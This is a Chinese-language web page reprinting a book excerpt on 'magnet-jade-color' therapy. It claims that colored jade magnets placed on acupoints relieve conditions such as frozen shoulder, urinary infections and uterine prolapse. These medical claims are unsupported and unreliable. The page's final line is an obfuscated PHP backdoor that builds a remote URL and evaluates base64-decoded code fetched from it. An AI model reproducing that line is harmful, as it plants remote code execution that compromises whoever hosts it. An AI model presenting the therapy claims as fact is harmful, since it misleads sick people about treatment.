Add Site to Favorites
首頁 arrow 另類醫學簡介 arrow 磁玉色三合一療法 (Magic Jade Therapy)
磁玉色三合一療法 (Magic Jade Therapy) Print E-mail
There are no translations available

磁玉色三合一療法
我將不同質地和顏色的五色玉石分別嵌進負極磁中,直接與病人穴道接觸的方式,整合出「磁、玉、色三合一療法」,的確展現了一加一加一遠大於三的療效。

人體電位變化攸關健康
民國八十三年我與葉政秀教授接觸,聽他談及以其專業研究的領域──「單極磁療法」來治療疾病,其理論是:人體有百分之七十的水,而每一滴水分子就是一個帶負電位稍強於正電位的小磁石,因此人體的負電位越高,就越健康越有活力;相對的,如果人體的負電位減弱、不足而來不及復原,或變成正電位的話,就會成為疾病的根源。

小小磁鐵解除病痛
數年前,我與在中壢當牙醫的好友許毅豪醫師無意間談到,每當他要為病患拔阻生齒(大臼齒)時,只利用書局賣的那種黑色磁鐵,貼在他們手部的幾個穴道上,就能夠消除多數人拔牙後腫痛與無法進食等情況。我聽了覺得很好奇!幾個磁鐵就有那麼好的效果?剛好診所裡一位助理小姐的先生經營「強磁」生意,我便請他拿一些磁鐵樣品過來,以便在臨床上驗證。

電磁場對人體影響大
人體本身是一坨坨的電子雲所組成,也是一塊塊的磁場。我們每天接受太陽磁場的照拂,在地球磁場上安居樂業,使用電磁場帶來生活上的便利,維護身體磁場以保持健康……;不論食衣住行坐臥,磁場是無所不在的。美國專門研究電磁波及電療的醫學專家Dr.Robert O.Becker甚至這麼形容:「我們都生活在電磁波的汪洋中」,正表示了磁場對人的影響遠超乎我們的想像。

BOX 泅泳在電磁波的汪洋
正因為我們生活在電磁波的汪洋中且不自覺,所以更要去認識它、瞭解它,以減少電磁波對我們的危害。譬如白天我們在太陽的正磁場下活動,但因交感神經活絡,因此太陽的正磁能對人體的傷害較少;可是晚上交感神經較弱時,我們休息睡覺的臥室裡就應該儘量減少電器的使用,以避免電磁波的干擾。

五顏六色也能治病

喜歡「胡思亂想」的我,對於「五行」(木火土金水)相對應的「五色」(青赤黃白黑)一直存在著濃厚的興趣,心想如果人體的每個臟器分別有其屬性,那麼「顏色」應該也具有某種治療效果才對!心理學認為顏色對於情緒具影響力,如紅色使人興奮、熱情,綠色使人穩定…..,即是一個最明顯的例子。

玉石能量導出病氣
以寶石來說,玉和水晶是最容易取得、也是最常被誇大神化的石材。根據古老的傳說,玉具有「袪邪避凶」的作用,這種為大家所認同的能量,讓人們將玉做成玉珮、玉盤、玉鐲等飾品或器具,隨身佩掛。電視、電影中常可見古代官帽或腰帶上配有玉石,殊不知官帽上的玉石正對印堂,腰帶的玉石正對神闕、氣海穴,可見古人即有養生之道;甚至,玉還伴隨人長眠地底,從出土的各種玉器製品可見一斑。可以說只要有中國人的地方,就少不了「玉」的存在。

BOX 對未知事物保持好奇
台大校長李嗣涔教授為美國史丹佛大學電機系博士,卻長期致力於研究「特異功能」,並曾開立「手指識字訓練班」,發現十四歲以下兒童經過訓練,約有一成左右能夠突破身體的限制向外擷取訊息,透過手指看到放進盒子裡的字。李教授因此提出「人腦中可能存在第三眼」的假設說。
佛學中也有所謂「開天眼」,可以感應到某些科學尚無法解釋的信息,而他們感覺到開天眼的位置,恰好正如佛菩薩圖像中眉心圓點的位置,也就是我們所說的印堂。對靈修者來說,這是一個氣場很強的穴道,根據印堂所反應出來的「氣色」,能做為此人禍福吉兇的判斷。李教授並表示,自古以來流傳下來的許多「傳說」,至今我們看來似乎是怪力亂神或斥為迷信之事,並不代表它們不存在,只是我們不知道、不瞭解而已。所以,我們不能對未知的事情抱持堅決否定的態度,否則人類不會進步。

磁玉石激發驚人療效
這麼說,或許讀者會覺得流於玄妙,但當我蒐集五種顏色色系(青、赤、黃、白、黑)為主的各種寶石,輔以科學的傅爾電針檢測數千人體質,再與不同顏色、質材的寶石、水晶一一比對,尋找對人類最有益的寶石,發現「玉」對人體的幫助最大。在國外,也有人從事寶石療法,稱之為「Crystal Therapy」,因此我試著將不同質地和顏色的五色玉石──青玉石、赤玉石、黃玉石、白玉石、黑玉石,比照色紙運用在臨床上,發覺此時竟然可不受光線變化的影響,且療效更佳,令我雀躍不已!

磁玉石療法臨床實例
-五十肩霎那間不見了
舉幾個臨床的案例,例如:子宮下垂、夜尿屬於「腎虛」症,按壓左側三陰交穴的痛感強,此時只要將黑色玉磁貼在患者左側的三陰交穴,便可緩解疾病的症狀。又如泌尿道感染、黃帶屬於「腎實」症,按壓右側三陰交穴的痛感強,只要將黑色玉磁貼在患者右側的三陰交穴便能緩解。曾有位五十歲的朱女士,因為右手臂無法上舉被診斷為五十肩,吃藥、打針、熱敷、運動……,疼痛依然故我。她聽從朋友的建議來到我這裡,我便運用磁玉色三合一療法,將紅色玉磁貼在朱女士的天宗穴(治療肩關節疼痛之穴,屬手太陽小腸經、心經與小腸經為表裡經,故用紅色),綠色玉磁貼於胸鎖乳突肌痛點(區域為大腸、小腸經,但胸鎖乳突肌痛點為筋受傷,因肝主筋,故用綠),白色玉磁貼於中府穴(屬手太陽肺經,因我認為此病為火剋金,但傷及肺,故用白),頃刻間朱女士的右手臂即可舉起,連她自己也無法置信。

所有另類醫學文字內容及案例介紹均為重點摘要
詳文,請至各大書局或網路書局購買(書泉出版社)九八年五月印行
劉大元醫師所著【不一樣的另類醫學】
 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));